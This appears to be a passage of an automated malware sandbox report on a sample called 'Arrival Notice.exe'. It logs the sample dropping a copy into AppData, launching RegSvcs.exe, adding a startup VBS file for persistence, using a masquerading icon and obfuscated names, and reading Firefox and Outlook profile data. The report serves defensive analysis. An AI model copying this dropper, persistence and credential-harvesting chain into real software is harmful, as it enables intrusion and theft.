                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Arrival Notice.exeReversingLabs: Detection: 63%
                    Source: C:\Users\user\Desktop\Arrival Notice.exeFile read: C:\Users\user\Desktop\Arrival Notice.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Arrival Notice.exe "C:\Users\user\Desktop\Arrival Notice.exe"
                    Source: C:\Users\user\Desktop\Arrival Notice.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\Arrival Notice.exe"
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Arrival Notice.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
                    Source: C:\Users\user\Desktop\Arrival Notice.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\Arrival Notice.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Arrival Notice.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Arrival Notice.exeStatic file information: File size 1246208 > 1048576
                    Source: Arrival Notice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: Arrival Notice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: Arrival Notice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: Arrival Notice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Arrival Notice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: Arrival Notice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: Arrival Notice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.2083901923.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2085516595.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2222185062.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2222613590.0000000004000000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: name.exe, 00000002.00000003.2083901923.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2085516595.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2222185062.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.2222613590.0000000004000000.00000004.00001000.00020000.00000000.sdmp
                    Source: Arrival Notice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: Arrival Notice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: Arrival Notice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: Arrival Notice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: Arrival Notice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0094C304 LoadLibraryA,GetProcAddress,0_2_0094C304
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008F8B85 push ecx; ret 0_2_008F8B98
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001BC590 push eax; retn 001Bh2_2_001BC599
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001D8B85 push ecx; ret 2_2_001D8B98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01060C45 push ebx; retf 3_2_01060C52
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01060C53 push ebx; retf 3_2_01060C52
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00CB0C45 push ebx; retf 6_2_00CB0C52
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00CB0C53 push ebx; retf 6_2_00CB0C52
                    Source: 2.2.name.exe.15d0000.1.raw.unpack, SMn5.csHigh entropy of concatenated method names: '_8Vimx', 'f7lK', 'uMKvoi6J', 'FWTI9h04fKT', 'OvYNDn1nF7', 'Uc1YsRO0ov', 'qvyIh', 'Q626D', 'VHPMMtos', 'MchLpClTgX'
                    Source: 5.2.name.exe.3950000.1.raw.unpack, SMn5.csHigh entropy of concatenated method names: '_8Vimx', 'f7lK', 'uMKvoi6J', 'FWTI9h04fKT', 'OvYNDn1nF7', 'Uc1YsRO0ov', 'qvyIh', 'Q626D', 'VHPMMtos', 'MchLpClTgX'
                    Source: C:\Users\user\Desktop\Arrival Notice.exeFile created: C:\Users\user\AppData\Local\directory\name.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to dropped file
                    Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (68).png
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008D4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008D4A35
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_009555FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_009555FD
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_001B4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_001B4A35
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_002355FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_002355FD
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008F33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008F33C7
                    Source: C:\Users\user\Desktop\Arrival Notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Arrival Notice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
